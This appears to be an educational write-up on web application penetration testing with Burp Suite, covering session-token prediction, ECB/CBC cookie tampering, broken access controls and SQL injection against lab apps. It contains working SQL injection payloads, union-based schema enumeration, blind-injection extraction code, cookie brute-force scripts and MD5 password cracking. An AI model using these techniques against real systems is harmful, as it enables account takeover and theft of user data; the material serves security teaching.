After the automated attack occurs, all error pages have a byte length of 1897. It seems the responses with a byte length of 526 are successful logins of user ids.


The application's authorization is deemed broken, as proven by the above user account being compromised.
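The user-id brute force above amounts to a loop over Cookie headers. A sketch with the standard library; the URL, the uid cookie name, and the 1897-byte error length mirror the example above, and the fetch function is injectable so the logic can be exercised without a live target:

```python
import urllib.request

def probe_uid(base_url, uid, fetch=urllib.request.urlopen):
    """Replay the remember-me cookie for one user id; return the response length."""
    req = urllib.request.Request(base_url)
    req.add_header("Cookie", f"uid={uid}")   # 'uid' mirrors the cookie parameter above
    with fetch(req) as resp:
        return len(resp.read())

def harvest(base_url, fetch=urllib.request.urlopen, error_len=1897):
    """Try uids 1-100; any response not matching the error-page length is a hit."""
    return [uid for uid in range(1, 101)
            if probe_uid(base_url, uid, fetch) != error_len]
```

This is exactly why remember-me tokens must be random rather than a sequential user id: a hundred requests enumerate every account.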

Session Management
Session management is responsible for sorting, handling, and following the multiple
requests amongst multiple users to the web application. Even the most robust
authentication system is invalidated by vulnerabilities in the session management
implementation. In maintaining state across the stateless http protocol, unique
tokens are generated by the application and granted to users during the time they
log in to the time they log out or expire from the session. This isn't to say that tokens are not transmitted to clients without logins though. It is very common, for instance, in shopping applications, to issue a token to a user who hasn't actually
authenticated. In this example, it would be a token transmitted with each response
and request to and from the application, keeping track of the items added to the
shopping cart. The token is dominantly transmitted via the cookie header. This is
via the set-cookie header during the response, and the cookie header in the
request. Set-Cookie: ASP.NET_SessionId=mza2ji454s04cwbgwb2ttj55 is an
example of a cookie field in an http response that is transmitting a token to the
client. Using Burp Suite we will be looking to intercept these tokens, and use the
Burp Sequencer to generate other valid tokens. Two inherent issues with sessions,
that can be exploited with an intercepting proxy are as follows: session generation
and session handling. One should never make any assumptions that a web
application is only using one parameter or item to handle the session. The
application may not use an overt or entire string in a cookie field as a token. It may
be only a portion of it, and it may employ other parameters such as hidden form
fields to handle sessions. A useful tip is to use Burp Repeater and slowly remove parts of any items that look like they may be part of the session. Consecutive requests in Repeater on a session-dependent page will reveal which removed items break the session, and subsequently show which parameters are effectively the token. This will help zero in on the next step of generating other tokens to hijack accounts. It is important to note that session tokens are not always
used to manage a user's state across the application. In stateless session management, all the data needed to handle state is submitted by the client. This is similar to the ViewState. If this is the case, an attacker will likely see much longer strings in the cookie or hidden form field. The data for state will most likely be encrypted and/or signed, and tampered requests to a page of the web app will be denied. For the most part, with this type of stateless management the server generates new parts of the token on every request, making it undesirable to try and attack. Combined with encryption, it is highly recommended that if this type of state management is used, the tester move on to code injection and broken access controls to exploit. The tokens being analyzed here are session tokens with structure. They may be generated in conjunction with username, date, etc., and then encoded into base64 or hex.
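A structured token like the ones described can often be decomposed simply by decoding and splitting it. A sketch against a hypothetical token built as base64 of user:timestamp; the format is invented for illustration:

```python
import base64

def dissect_token(token: str) -> dict:
    """Decode a hypothetical structured session token of the form b64(user:timestamp)."""
    raw = base64.b64decode(token).decode("ascii")
    user, stamp = raw.split(":")
    return {"user": user, "timestamp": int(stamp)}

# A token built this way is trivially reversible -- exactly the weakness described:
# an attacker who recognizes the structure can forge tokens for other users.
sample = base64.b64encode(b"shawn:1384549200").decode("ascii")
print(dissect_token(sample))   # {'user': 'shawn', 'timestamp': 1384549200}
```

Encoding is not encryption; base64 or hex only conceals structure from a casual glance.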

Predictable tokens are disastrous. The worst kind of predictable token would be tokens that are issued sequentially. It is trivial for an attacker to use Burp to issue thousands of requests while simultaneously altering the digits in the token and then referring to the http response code for successful logins. Token generation is often weak when its security is primarily based on concealing the sequence. Weak obfuscation methods are easy to reverse engineer by looking closely at the string, decoding parts of it, and then looking at patterns in the generated tokens. Time-dependent tokens that rely too heavily on the clock are not random enough and can also be attacked by large automated token generation attacks. An example of a bad token is one where the first part increases sequentially by one for every token issued, and the second part is completely time based. If an attacker logs in twice and sees the first part of the token increase by 2 instead of 1, another user logged in between, and the time-based second part becomes trivial to automate because the attacker holds the timestamp issued directly before the victim's, and the one directly after. Another common issue with
the mishandling of securing tokens comes when developers attempt to use weak
encryption modes. CBC and ECB encryption modes both leave cookie contents able to be manipulated. The problem with ECB occurs because the same block of encrypted content in a cookie always decrypts to the same block of plaintext, independently of its neighboring blocks. This is an issue because an attacker would only need to swap 8-byte ciphertext blocks around in appropriate places to see if they can manipulate the cookie. For example, if userid= is one block of data, and the next block is 883;app=, an attacker could switch the second block with perhaps the sixth block of data that decrypts to 1;time=. This would effectively switch the userid being logged into to userid 1.
Many applications have been found to not check all aspects of a cookie and this
attack has worked. CBC mode differs from the ECB cipher in the fact that each block of ciphertext, after being decrypted, is XORed against the previous block of ciphertext to recover the plaintext. This means an attacker who modifies the encrypted text completely scrambles the plaintext of the modified block, while flipping the corresponding bits in the next decrypted block. There is a caveat though. Many applications still only validate the user id of the cookie. An attacker can automate an attack using the bit flipper method. This method creates many requests, flipping a different bit of the string in each one. Running the flipper attack long enough can result in getting account hits with the right user id number. The above is an example snippet of the bit flipper attack where the last request actually produces an effective account bypass. In the second to last attempt the d in uid was flipped to produce an e, which is not valid, but the final result is all that matters.
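The ECB block-swapping property is easy to demonstrate with a toy 8-byte block cipher. XOR with a fixed key stands in here for DES; it is not secure, but it shares the relevant property that each block encrypts and decrypts independently of its neighbors. The cookie layout mirrors the userid= example above:

```python
KEY = bytes(range(8))   # toy 8-byte key; stands in for a real block cipher key

def ecb_encrypt(plaintext: bytes) -> bytes:
    """Toy ECB block cipher: every 8-byte block is enciphered independently,
    so identical plaintext blocks yield identical ciphertext blocks."""
    assert len(plaintext) % 8 == 0
    return bytes(b ^ KEY[i % 8] for i, b in enumerate(plaintext))

def ecb_decrypt(ciphertext: bytes) -> bytes:
    return ecb_encrypt(ciphertext)   # XOR is its own inverse

# Cookie plaintext laid out in 8-byte blocks, mirroring the example above.
pt = b"userid= " + b"883;app=" + b"cart;ts=" + b"1;time= "
ct = ecb_encrypt(pt)

# Swap ciphertext blocks 1 and 3: because blocks decrypt independently,
# the plaintext blocks swap too -- changing the userid without the key.
blocks = [ct[i:i + 8] for i in range(0, len(ct), 8)]
blocks[1], blocks[3] = blocks[3], blocks[1]
print(ecb_decrypt(b"".join(blocks)))   # b'userid= 1;time= cart;ts=883;app='
```

A server that only parses the leading userid= field now logs the attacker in as userid 1, which is exactly the attack described above.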

Having secure generation methods for session tokens is

absolutely necessary, but all in vain if sessions are not handled correctly. If an
attacker is able to intercept a session and replay the captured token, he has no
need to even exploit generation weaknesses. It should be assumed that when
discussing session handling vulnerabilities, that the session token is being
transmitted via the cookie header. Issues with applying https across the session-handling process are overwhelmingly common in web apps. Where cookies are transmitted via http, it is assumed that they are vulnerable to interception. Many websites employ https only on the login page and after. The issue occurs when they issue a
session cookie to a user before they even authenticate. Even worse, once the user
authenticates and switches to https, the session cookie remains unchanged. A
developer should make sure that the cookie changes after the authenticated
session begins. They should also realize that issues occur when certain pages, like an about or help page, do not get transmitted via https. A weakness like this occurs when a user who is already authenticated with their https session navigates through the application and hits a page that is not forcing https. The interceptor now has the authenticated cookie. Developers must make sure that they enforce SSL on every page that an authenticated user may walk through. Better yet, setting the secure flag on the Set-Cookie header enforces that the cookie will only be transmitted via https. Another issue worth
looking into is whether the web server is running any services on port 80. A
malicious attacker could induce a user to visit a url of the service running on port
80. This is more intrusive of an attack and will be covered later. When securing a
site, this is important to check regardless and a specific check of visiting a site on
the port 80 service will hopefully reveal the cookie was not transmitted.
The main components to remember are secure handling and secure token generation. Submit tokens over https only, change the token value after authentication, and limit cookie scope. It is extremely important
to set the path flags and domain scope strictly and not liberally. This will aid in
deterring attackers from trying to hijack cookies using cross site request
forgery/cross site scripting attacks. Per page tokens should be used and are used
amongst the most secure applications. This occurs by having a token passed
through a hidden form field or cookie that changes on every request. This will
defeat XSRF. Cookies should never be passed through URL parameters as that
makes session tokens susceptible to being hijacked through logs. Finally,
concurrent sessions should be limited and flagged, a new cookie should be issued
with a new login of the same user, and the original session terminated. Speaking of termination, a cookie should be set to time out if the user does not explicitly log out. If the user does log out, the server needs to terminate that session server side, not just client side by deleting the cookie while still accepting the session if replayed by an attacker.
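The hardening advice above maps directly onto cookie attributes. A sketch using the standard library's cookie helper; the token value and path are placeholders:

```python
from http.cookies import SimpleCookie

cookie = SimpleCookie()
cookie["session"] = "OPAQUE_RANDOM_TOKEN"   # placeholder; generate with secrets
cookie["session"]["secure"] = True          # only ever transmitted over https
cookie["session"]["httponly"] = True        # not readable by injected script
cookie["session"]["path"] = "/app"          # strict scope, not the whole site
cookie["session"]["samesite"] = "Strict"    # blunts cross site request forgery
print(cookie["session"].OutputString())
```

The emitted string is what would follow Set-Cookie: in the response header; the Secure flag is the one called out above, and the strict path limits the cookie's scope.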

The bit flipping cookie attack will be demonstrated below:

The cookie is viewed, and seems to be using the CBC cipher for encryption.


We select the entire cookie as the payload field.

The bit flipping payload option should be selected.


Hundreds of requests are sent to the web application, with a different bit flipped in each request.

The attack is successful after only 233 requests.


Rendering the page on the bottom pane shows multiple user ids were compromised by this bit flipping attack. The cookie is insecure and the encryption is being bypassed. The decryption of the cookie is done server side, so although we never see the plaintext, making subtle changes in every request eventually affected the cookie's userid= field. So not only did this badly generated cookie use a weak encryption scheme, it didn't seem to validate other parameters of the cookie. When testing a site's cookie generation process for randomness, Burp is a useful tool.



Using Burp Sequencer, we can capture thousands of tokens from a site. Burp Sequencer has built-in test methods that will check the amount of randomness in each bit of the cookie. Bit-level analysis of these cookies showed major problems in multiple bit fields, especially before the 10th bit. This cookie generation scheme fails the randomness test and should be rejected.
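A crude version of Sequencer's per-bit check can be scripted: for each bit position, count how often the bit is set across the captured tokens. A well-generated set should sit near 50 percent at every position. A sketch over hypothetical captured tokens:

```python
import os

def bit_bias(tokens):
    """For each bit position, return the fraction of tokens with that bit set.
    Values pinned far from 0.5 indicate a fixed or low-entropy bit field."""
    nbits = len(tokens[0]) * 8
    counts = [0] * nbits
    for tok in tokens:
        for pos in range(nbits):
            if tok[pos // 8] >> (7 - pos % 8) & 1:
                counts[pos] += 1
    return [c / len(tokens) for c in counts]

# Hypothetical tokens whose first byte never changes (0xAA): the first eight
# ratios come back pinned at 1.0 or 0.0, failing the randomness test.
suspect = [b"\xaa" + os.urandom(3) for _ in range(1000)]
bias = bit_bias(suspect)
print(bias[:8])   # [1.0, 0.0, 1.0, 0.0, 1.0, 0.0, 1.0, 0.0]
```

Sequencer applies far more rigorous FIPS-style tests, but even this simple count exposes the kind of fixed bit fields described above.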

Bypassing Access Controls

When access controls are not implemented correctly, even the most beefed-up security mechanisms that cover code injection, cookie management, authentication, etc., become nullified. Broken access controls are seen by the authors of The Web Application Hacker's Handbook at a frequency of 71 percent. What makes detecting faulty access controls so difficult? It lies merely in the fact that for an access control to be detected as faulty, every possible request, area, and action of a web application must be stepped through. The first type of broken access model applies to users who are already authenticated with a system. Vertical breaking involves a situation where a user or group of users who do not have certain functionality bypass the restriction and access such functionality. An example of this is quite simple, and could be
illustrated as an ordinary user accessing administrative functions. Perhaps an
employee can only sign off on a certain dollar amount of investment, and a
manager must sign off on a set dollar amount that is higher than the regular

employee. If the regular employee finds a way to process a transaction above their
threshold, they have performed a vertical bypass. Horizontal bypasses can also occur. These are described as situations where users with the same authority, accessing the same function, are able to access more resources than they should be able to. An example of this would be where all users are allowed to check their own email, but one user has found a horizontal bypass that allows him to check all users' emails. There are also context-based access controls. These enforce that where the application's state is logically constrained, the user is also behaving within those confines. For example, one could say that context-based access control has been broken if a user was able to skip the payment process of a shopping cart and go straight to shipping options.
Situations occur where the functionality is completely unprotected. An
example of this is when web applications dynamically build the user interface
through javascript client side code. Take a look at this example of code:

var isAdmin = false;

if (isAdmin)
{ adminMenu.addItem("/menus/secure/ff457/addNewPortalUser2.jsp",
"a new user"); }

(Web Application Hacker's Handbook)


Simply studying the language here tells us that the user is not admin, but the URL
to add new users is discoverable. If access controls are broken and unprotected like
in this case, a huge vulnerability occurs. Identifier based functions are also a cause
of concern and need to be tested for broken access controls. For instance, a DocViewer page that takes the id of a document specific to a certain user as a URL parameter. An attacker would need to know the DocViewer part of the URL, though this may not be challenging to directory bust with brute force methods. Finally, the fact that the parameter id seems to be
numerically generated should be looked into. If some sort of sequential pattern can
be ascertained by the attacker, this creates a problem. Access logs are a haven for
access to these application pages such as viewdocument, createUser, etc, as
well as the specific IDs associated with them. Access logs therefore need to be
protected at all costs when dealing with these issues, as it goes without saying that
URLs do not have any implied secrecy.
Multistage functions must revalidate credentials at every stage of a web
application function. For example, if a bank employee has requested funds be sent
to a certain source account, and has verified themselves, an attacker should not be
able to intercept the final stage post request and change the destination account in
a horizontal bypass. Static resources are also an issue with multistage processes. If
a user goes through every step of purchase to receive the download link to an
ebook, and the ebook download url is a static link such as
http://book/download/923434242342.pdf, an attacker can attempt to skip

purchase and just brute force numbers to get ebook download urls. If the numbers are, for example, ISBNs, it becomes even simpler.
There are numerous steps to take in securing access
controls, considering every request across the app must be studied. Other methods to test for include improper trust of the Referer header. Many web applications will not allow ordinary users to access administrative functions, but fail to do this if the user modifies the Referer header to appear to come from an administrative page. Location-based access controls are useful as a deterrent or in combination with other methods, but useless if used alone. A VPN or web proxy mapped to the approximate geo location of the specific user will nullify this control check. Simple social engineering methods or recon can successfully deduce a user's basic location.
A final issue to touch upon is correct firewall/server
configuration in relation to filtering requests to unauthorized areas of the web
application. It would be a common rule to enforce that a non-administrative
account sending an http get or more likely a post request to an administrative URL
would be blocked. Unfortunately, it is more complicated than this. What occurs in a
situation where the attacker sends a head request instead of an http-get request to
the application? If the application is configured to filter only HTTP GET requests, the request method can be altered in the intercepting proxy. Let us briefly review what a HEAD request is: a HEAD request is simply an HTTP GET request without a message body in the return. The attacker will not care that no message body is returned if they are still able to pass the request through the broken access control by changing the request method and the URL parameters. Perhaps they create a new user account; they can indeed check this manually after the fact, regardless of whether a message body is returned or not. It is imperative
therefore, that the application level code verify what request method is being
issued, and to block offending requests that should be filtered out. The worst of all insecure access control methods is URL parameter access control. It has been seen in applications in the past, regardless of how blatant of an issue it is. A common theme would be something along the lines of an admin=true URL parameter, where manipulating the URL parameters could allow access. This is a more obvious example, and other examples may be much less intuitive, but if a determined attacker is able to create many accounts, and even at some point get a higher privileged account, they can analyze patterns or the methodology used in the passed URL parameters to bypass access controls.
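The application-level fix is to treat the request method itself as untrusted input and deny by default. A minimal sketch; the admin path prefix and the allowed-verb set are illustrative:

```python
ALLOWED_METHODS = {"GET", "POST"}   # everything else (HEAD, PUT, ...) is refused

def authorize(method: str, path: str, is_admin: bool) -> bool:
    """Deny-by-default check: unknown verbs are refused outright, and the
    admin check runs for every method, not just GET."""
    if method.upper() not in ALLOWED_METHODS:
        return False
    if path.startswith("/admin") and not is_admin:   # illustrative admin prefix
        return False
    return True

# A HEAD request to an admin URL no longer slips past a GET-only filter.
print(authorize("HEAD", "/admin/addUser", is_admin=False))   # False
print(authorize("GET", "/home", is_admin=False))             # True
```

Because the verb is checked before the path, changing GET to HEAD in an intercepting proxy gains the attacker nothing.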
Now for the attacks:


Logged in as an ordinary user at first.

We examine the GET request header.

We simply change the requested path in the GET request to admin.ashx. If the application is

vulnerable, it will allow us access.


Application is broken.

Above we are rejected by a more secure application.


In this request, we need to not only change the GET request path to admin.ashx?, but apparently submitting an admin=true value as well is what breaks the application.


The above is a useful feature in Burp to use if you have white box access to the application. Burp's site map comparer will compare two site maps, one of an admin and one of a user. So, step through the entire application as an admin, then step through the application as an ordinary user, and save the two sessions. Burp's site map comparer will highlight if any access controls are broken as it applies the same http requests to the ordinary user. As seen above, one URL accessible to the admin was also accessible to the ordinary user.

The above is another GET request intercepted by BURP. This site has very weak
access control methods.

We set the user id as the attack payload to harvest every user account.


According to the attack, looking at the length of bytes returned, user ids 53-59 are all accounts we can access.

Testing for access control vulnerabilities can be easy or very hard depending on the subtlety of things. With that being said, it is mandatory to step through the application request by request, testing all low privileged accounts and their access to vertical privileges outside their scope of authority. A mandatory design should be a central access control checker built into the application. Each request should be passed through this central component, which in turn checks the user's role, and then decides if the requested URL is under the permission umbrella assigned to the user being checked.
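That central checker design can be sketched as a single gate every request passes through. The roles and the permission table here are made up for illustration:

```python
# Illustrative central access control gate: every request is resolved through
# one permission table instead of per-page checks scattered around the app.
PERMISSIONS = {
    "user":  {"/home", "/account"},
    "admin": {"/home", "/account", "/admin/addUser"},
}

def check_access(role: str, url: str) -> bool:
    """Deny by default: unknown roles and unlisted URLs are both refused."""
    return url in PERMISSIONS.get(role, set())

def handle_request(role: str, url: str) -> str:
    """The single gate every request passes through before any page logic runs."""
    if not check_access(role, url):
        return "403 Forbidden"
    return "200 OK"

print(handle_request("user", "/admin/addUser"))   # 403 Forbidden
print(handle_request("admin", "/admin/addUser"))  # 200 OK
```

Because the decision is centralized, adding a new page means adding one table entry, rather than remembering to re-implement the check on every page.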

SQL Injection
Data stores are highly vulnerable to attack, and therefore it is imperative to cover the core vulnerabilities that exist. Common database functions are to store usernames, passwords, credit card numbers, and other highly sensitive data. A functioning web application is one that passes user input through the web application, successfully fetches the appropriate content in the database, and returns it to the user. It is understood what the function of databases is, but what exactly makes them vulnerable to exploits? The code injection that will be focused on in this project is SQL injection. SQL is an interpreted language; more specifically, the code interacts with the web application with the use of a runtime component. The interpreter therefore receives a mix of human-supplied instructions and code instructions to execute. With this mixing of human-supplied data and SQL data, it is the interpreter's job to separate the different instructions and apply them correctly. The pure nature of how the SQL language interacts with the data stores behind the web application makes the exploit known as code injection possible. There are a few different SQL database types, but MySQL will be focused on here. Proper SQL injection techniques allow an attacker to bypass logins, add or modify data, or hijack a database completely and execute a shell on the server.

The first attack will be a user login bypass. To fully understand the attack, the basic SQL query that fetches a username and password and returns it to the web application for login must be understood. When a user supplies the username shawn to the username field, supplies the password vulnerable to the password field box, and submits the entry, the SQL query sent to the database would be as follows: SELECT * FROM users WHERE username='shawn' AND password='vulnerable'. The table being checked is the users table, and every row in that users table contains a username column. This specific SQL query is querying for the username of shawn and the password of vulnerable, so if the users table, which contains the columns username and password, contains a match of shawn and vulnerable, it will be returned to the web application. If the username is not found or if the password was incorrect, a result will still be returned to the web application, but only if there was a match will the application's logic allow an authenticated session to begin. As an attacker with malicious intent we don't know the user's password though, so we really do not care about the entire SQL statement. It is important to know then that -- (two hyphens) successfully comments out the rest of an SQL statement. An attacker may want to try shawn in the username form, and then ' or 1=1 -- in the password field. After all, 1=1 is a true statement, but surprisingly, performing such an action validates the entire sql query as true and simply pulls the first record in the database, for instance admin. We need to specify the username in parentheses, because without parentheses the or 1=1 true sql statement is simply applied to the whole query. Parenthesizing the injection like this: ' or (1=1 and username='shawn')-- would specifically work on an injectable login box to log in as the specific user. Let us revisit ' or 1=1 being injected into the username and password field though. This is a useful command when trying to get the admin account of a web application. Considering the fact that this true SQL query returns the first value, we can safely wager that the first record in the users table is a high level user that was first set up by the developers of the web application.
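The login query above can be reproduced end to end with Python's built-in sqlite3 to show both the flaw and the fix. The schema is a stand-in for the application's users table, and the admin password is invented:

```python
import sqlite3

db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE users (username TEXT, password TEXT)")
db.execute("INSERT INTO users VALUES ('admin', 's3cret'), ('shawn', 'vulnerable')")

def login_vulnerable(user, pw):
    # User input concatenated straight into the query -- the flaw described above.
    query = f"SELECT * FROM users WHERE username='{user}' AND password='{pw}'"
    return db.execute(query).fetchall()

def login_safe(user, pw):
    # Parameterized query: input is bound as data, never parsed as SQL.
    return db.execute("SELECT * FROM users WHERE username=? AND password=?",
                      (user, pw)).fetchall()

# ' OR 1=1 -- is true for every row, so the first record (admin) comes back.
print(login_vulnerable("' OR 1=1 --", "x")[0])   # ('admin', 's3cret')
print(login_safe("' OR 1=1 --", "x"))            # []
```

The parameterized version is the standard defense: the driver never lets the quote or the comment sequence reach the interpreter as SQL.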
The first step in SQL injection is to actually verify that a vulnerability exists and that SQL is being used. For MySQL, inserting a single quote should sufficiently throw a syntax error from a broken query.

We can deduce from this error message that SQL metacharacters in the login box are not being sanitized and are instead being passed through the web application to the database.

As seen above, executing an OR statement that is true makes the entire SQL statement true, and by submitting that into the login box, we authenticate as the first user in the table, which is appropriately the admin. The first quotation tick closes the username portion of the query, a true statement is then applied, and since the password is not known, that part of the query is commented out.
Many web applications employ weak filtering mechanisms to defeat SQL injection. Constant fuzzing by a tester, encoding blacklisted characters and expressions with different encoding techniques, can defeat weak blacklists. This will

be shown in the following screenshot, as URL encoding of certain characters in the
injection is performed in Burp Repeater. Repeater should be used anytime a tester
wants to make quick changes to the parameters being submitted to the application,
without having to capture the request again. The subsequent responses show up on
the response pane, showing rendered results. Notice that or 1=1-- has been encoded as or+1%3d1--+, which bypasses this particular weak filter.
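The encoding step Repeater performs by hand can be scripted with the standard library. A sketch; the payload is the familiar one from above, but the blacklist function is hypothetical, standing in for the kind of weak filter being bypassed:

```python
from urllib.parse import quote_plus, unquote_plus

payload = "' or 1=1--"
encoded = quote_plus(payload)
print(encoded)   # %27+or+1%3D1--

def naive_blacklist(value: str) -> bool:
    """A weak filter that inspects the raw parameter without decoding it first."""
    return " or " in value.lower()

print(naive_blacklist(encoded))                 # False -- encoded form slips past
print(naive_blacklist(unquote_plus(encoded)))   # True  -- the server still decodes it
```

The filter sees the encoded string, but the database layer sees the decoded one; any blacklist that checks before decoding is bypassable this way.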

In the following screenshots an exact user will be zeroed in on.

In the shot above, a simple ease-of-use modification is applied. The password login box is edited, and its size is changed from 20 to 80. This expands the size of the box so we can execute a long query. type=password is also edited to type=text so actual text is seen in the password box instead of bullets.

Here we see the properly parenthesized command, with a true OR statement being passed to the database and the username column specified as user shawn.
Again, take notice of the double hyphen and the space that follows it. In MySQL,
this comments out the remainder of the query, or more specifically the
password part of the query since we are not aware of the password. The actual
query is formatted like this: SELECT * FROM accounts WHERE username='' AND

As seen above the code injection has successfully logged us in as the user shawn.
Next, an attack against all user data will be leveraged.


Here the syntax is any username followed by a true SQL statement. This command should successfully dump all the records. We know from before that the syntax this server uses is SELECT * FROM accounts WHERE username='shawn', so adding a closing quote and a true OR statement at the end of allnames and then commenting out the rest of the query effectively changes this command to select all user accounts. The results are seen here:

A successful dump of the entire users table and its corresponding columns was performed, but the injection can be modified again for just a single user. Injecting ' or (1=1 and username='shawn')-- results in the following user info:


The above web application was very easy to exploit because in its error messages,
very fruitful information was given. The error message thrown by the SQL server to
the client showed the syntax of not only the database name, but the table names,
and the column names. The next attack will leverage Burp Suite to brute force
table and column names with a more vague error throwing web application, so SQL
injection can still occur.

The attack is started by probing the web app to see if it accepts SQL syntax.

An error is returned that verifies data is not being sanitized, but it is more cryptic.
The previous web application revealed entire query structures. The injection points
need to be discovered so an order by clause must be passed into the url parameter
until an error occurs.


Passing order by 3 into the url threw an error, whereas order by 2 and order by 1 produced no errors on the page. Two spaces will be used to inject as follows:

Viewing the screenshot above, a UNION SELECT query is performed with NULL
values, since it is not yet known what the column values are. First name: and
Surname are exposed on the page in red. Next, a version command is executed by
substituting @@version into the first NULL position. The query ends in
%20@@VERSION,NULL--%20%20&Submit=Submit# and returns the following:

The attacker does not know the table name or column names, so the query is
passed to Burp Suite for automation. Examine the URL ending in
%20NULL,NULL%20from%20UNKNOWNTABLE--%20%20&Submit=Submit#. The URL
is modified to select NULL,NULL from unknowntable and returns the appropriate error:

The next step in the attack is to pass the url to Burp Intruder so the table value can
be dictionary attacked.

The unknown parameter of the URL is flagged to be attacked, and a preloaded
database of popular table names will be the dictionary used. (See next page)


After the attack is run, the lengths of the average responses range from roughly
400 to 600 bytes, and rendering any of these pages results in an error that the
table name does not exist.


Upon ordering the payloads by page response length, outliers are found with
lengths in the 4000 to 5000 range. These correspond to valid table names; notice
that no unknown table error appears when such a page is rendered. The focus
here is the users table.

It is known the table name is users, but the column names are unknown, so they
will now be brute forced using the same method as the table name. Notice that
unknowntable in the first payload attack has been changed to the proper table
name of users, and column_names is now the payload insertion point. Of course,
a different dictionary will be used, one that contains common column names
instead of common table names. Upon studying the screenshots, it can be seen
that the parameters user, password, and user_id were all successful hits, based
on the different response lengths and the final rendering of the HTTP response.


At this point it would make sense to attack all the user ids to get the username and
password dumps pertaining to each id. This particular web application does not
require it, since the username and password can be extracted directly, but many
applications vary so it will be shown regardless.

The command being passed in the URL is SELECT user(column),password(column)
FROM users(table) WHERE user_id=0. This time the payload insertion point will be
the user_id field, and a sequential number brute force will be used to dump the
ids. The %20 between the parameters is simply a URL-encoded space. Burp can
URL-encode payload characters automatically, which makes editing parameters in
URL queries painless.
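The %20 encoding mentioned above can be verified directly with Python's standard library; the query string here is just a representative example.

```python
from urllib.parse import quote, unquote

# A space is not legal in a URL and must be percent-encoded as %20.
payload = "2 AND 1=1 UNION SELECT user,password FROM users"
encoded = quote(payload)

print(encoded)           # every space becomes %20
print(unquote(encoded))  # decoding restores the original query
```

This mirrors what Burp does for you when it URL-encodes a payload before sending it.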

Sequential number iteration brute force being applied here:

The results are returned in Burp Intruder and a user with an id of 4 is investigated.

The username is Pablo and the password appears to be an MD5 hash, which is trivial
to break. Web developers should have long abandoned unsalted MD5 as a hashing
method in favor of salted SHA-2, but it is still seen in insecure databases. Copying
the hash into an MD5 lookup database cracks the password easily. It is revealed below.
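The lookup such a "decryption" site performs is nothing more than hashing candidate words and comparing, just with enormous precomputed tables. A minimal sketch, with a made-up wordlist and a demo hash generated locally (Pablo's actual hash is not reproduced here):

```python
import hashlib

def crack_md5(target_hash, wordlist):
    # Hash each candidate and compare against the target digest.
    for word in wordlist:
        if hashlib.md5(word.encode()).hexdigest() == target_hash:
            return word
    return None

# Demo with a hash we create ourselves.
target = hashlib.md5(b"letmein").hexdigest()
print(crack_md5(target, ["password", "123456", "letmein"]))
```

Because MD5 is fast and unsalted, this comparison can be run billions of times per second, which is why it cracks so easily.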


There will be situations in web applications where no error is shown and the page
reacts no differently when submitting crafted input. The type of SQL injection that
must be performed in this case is blind SQL injection. Going further, when no
string fields are injectable because quotes are being filtered properly, an attacker
must look to attack the application through its numeric fields. This is done by
using the SUBSTRING and ASCII functions of SQL. Even with limitations like this, it
is still possible to extract data byte by byte. An example would be
ASCII(SUBSTRING('Shawn',1,1)). Injected into a numeric form field, this yields the
result 83: SUBSTRING with arguments 1,1 returns the value S, and conversion to
ASCII returns 83. Following this logic, an attacker can still perform injection one
byte at a time, though this is brutally time consuming and automated methods are
preferred.
SQLmap is a preferred tool to use to automate blind SQL injection where numeric
fields must be injected. How can an attacker leverage a blind attack when no error
or response is given by the web application? The key is to produce conditional
Boolean-based attacks, where true and false conditions make the application react
in observably different ways. For instance, a vulnerable application might log in
users when the query contains shawn' AND 6=6 but reject shawn' AND 6=5: the
6=5 condition is false, and hence rejection occurs. When injecting into a numeric
field, the following would be synonymous with the above examples:
ASCII(SUBSTRING('Shawn',1,1))=83 as a true statement, and
ASCII(SUBSTRING('Shawn',1,1))=84 as a false statement. Think of a hypothetical
application that allows users to search for movies in its database. When a movie is
in the database, a message is returned saying so; when it is not, a message says
no matches were found. If the attacker knows the movie Robocop exists, and the
query Robocop' AND 1=1# returns the message that the movie is in the database,
then the attacker can probe further. If Robocop' AND 1=2# then returns an error
that the movie is not in the database, that verifies the form is vulnerable to blind
SQL injection. Cycling through the characters one byte at a time allows blind SQL
injection to work, getting hit after hit until the entire string is extracted. An ASCII
chart is necessary with this type of injection, though automated techniques are
preferred.
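The byte-at-a-time extraction loop described above can be simulated without a server. The oracle function below stands in for an HTTP request whose page differs for true versus false conditions; the secret value Shawn and the printable-ASCII search range are assumptions for the demo.

```python
# Simulated boolean oracle: in a real attack this would be a request whose
# response page differs for true vs. false injected conditions.
SECRET = "Shawn"  # the value the attacker cannot read directly

def oracle(position, ascii_guess):
    # Stands in for: ASCII(SUBSTRING(secret, position, 1)) = ascii_guess
    return position <= len(SECRET) and ord(SECRET[position - 1]) == ascii_guess

def extract(max_len=32):
    out = ""
    for pos in range(1, max_len + 1):
        for code in range(32, 127):       # printable ASCII range
            if oracle(pos, code):
                out += chr(code)
                break
        else:
            return out                    # no character matched: string ended
    return out

print(extract())  # recovers the secret one byte at a time
```

Each recovered character costs up to 95 oracle queries, which is why tools automate this rather than doing it by hand.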

We have a form accepting user input above. It takes user ID numbers and returns
their first and last name.

There is no user in the database whose id is literally 2 and 1=1, yet the
application returned a first and last name regardless. This tells the attacker that
SQL queries can be passed through the form blindly.

Passing the query a second time with quotes in the appropriate positions yields no
response from the web application. This tells us there is a security measure on the
web application filtering quotation marks. How will injection occur when specific
columns and tables must be named but quotes are blocked? The attacker will have
to encode the terms as hex literals of their ASCII values.

The number of injectable attributes/columns is found next. The command 2 order
by 3 returned no database results, telling the attacker that there are two injectable
columns.


A UNION SELECT query shows how the application handles the injected queries:
2 AND 1=1 union select null,user()# executed above reveals root@localhost as
the user in the surname field.

The true SQL statement is abandoned in favor of 1=0 instead of 1=1 here, so the
attacker can stop the Gordon Brown record from being pulled alongside every
malicious query, for better clarity.


2 AND 1=0 union select null,version()# reveals to the attacker that the MySQL
version is 5.1.41. What if the query were being filtered by a firewall and data
needed to be extracted byte by byte?

2 and 1=0 union select null,substring(@@version,1,1)=5 # executed above
returns a 1 in the surname field, confirming that 5 is indeed the first character of
the MySQL version. Next a "." must be found, because the version is 5.1 and so
on; "." has a value of 46 in ASCII. Notice also the arguments (2,1) instead of
(1,1), because the second character is being tested. So 2 and 1=0 union select
null,ascii(substring(@@version,2,1))=46 # is the appropriate command to execute
to confirm the next character. The surname returns a value of 1 and not 0,
confirming the next character is indeed ".".

The attacker could continue this to enumerate the entire version one value at a
time; the shorter commands have not been filtered so far, though firewall issues
will complicate things later.


2 and 1=0 union select null,database()# reveals that dvwa is the name of the
database data will be extracted from.
2 and 1=0 union select null,table_name from information_schema.tables WHERE
table_schema='dvwa' is the command to get the table names from the database.

